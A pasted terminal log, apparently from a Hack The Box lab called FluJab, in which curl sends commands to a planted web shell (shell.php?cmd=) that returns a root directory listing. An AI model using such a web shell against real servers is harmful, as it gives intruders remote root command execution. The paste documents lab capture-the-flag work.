  3228.         <title>MASTERHACKERZ ONLY!!</title>
  3229.         <style type="text/css">
  3230.        body {
  3231.         background-color: #000;
  3232.         color: green;
  3233.         text-indent: 50px;
  3234.         font-size: 1.5em;
  3235.        }
  3236.  
  3237.        img {
  3238.               width: 55%;
  3239.               height: auto;
  3240.        }
  3241.  
  3242.     </style>
  3243. <body>
  3244. <pre>
  3245. <center>
  3246. <H2>5up3r 1337 r00t 9r1v 5h311 v1.0.3b</H2>Use: /shell.php?cmd=[commands]
  3247. --------------------------------------------------------------
  3248.  
  3249. /root
  3250.  
  3251. </center>
  3252. </pre>
  3253. </body>root@kali:~/HTB/FluJab# curl -k -X GET "https://custoomercare.megabank.htb/shell.php?cmd=ls -al"
  3254. <!DOCTYPE html>
  3255. <html>
  3256.     <head>
  3257.         <title>MASTERHACKERZ ONLY!!</title>
  3258.         <style type="text/css">
  3259.        body {
  3260.         background-color: #000;
  3261.         color: green;
  3262.         text-indent: 50px;
  3263.         font-size: 1.5em;
  3264.        }
  3265.  
  3266.        img {
  3267.               width: 55%;
  3268.               height: auto;
  3269.        }
  3270.  
  3271.     </style>
  3272. <body>
  3273. <pre>
  3274. <center>
  3275. <H2>5up3r 1337 r00t 9r1v 5h311 v1.0.3b</H2>Use: /shell.php?cmd=[commands]
  3276. --------------------------------------------------------------
  3277.  
  3278. </center>
  3279.     total 56
  3280.     drwx------  6 root root 4096 Dec  2 00:04 .
  3281.     drwxr-xr-x 23 root root 4096 Nov 28 01:22 ..
  3282.     -rw-r--r--  1 root root  597 Nov 28 01:46 .bashrc
  3283.     drwx------  2 root root 4096 Dec  1 21:46 .cache
  3284.     drwxrwxrwx  2 root root 4096 Nov 27 16:56 .config
  3285.     -rw-------  1 root root  403 Dec  2 00:04 .mysql_history
  3286.     drwxr-xr-x  2 root root 4096 Nov 27 13:52 .nano
  3287.     -rw-r--r--  1 root root  148 Aug 17  2015 .profile
  3288.     -r--------  1 root root   34 Nov 28 01:45 root.txt
  3289.     -rw-r--r--  1 root root   66 Nov 27 21:18 .selected_editor
  3290.     drwxr-xr-x  2 root root 4096 Nov 27 13:57 .ssh
  3291.     -rw-r--r--  1 root root  173 Nov 28 01:06 .wget-hsts
  3292.     -rw-------  1 root root   52 Nov 27 13:57 .Xauthority
  3293.  
  3294.  
  3295. </center>
  3296. </pre>
  3297. </body>root@kali:~/HTB/FluJab#
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement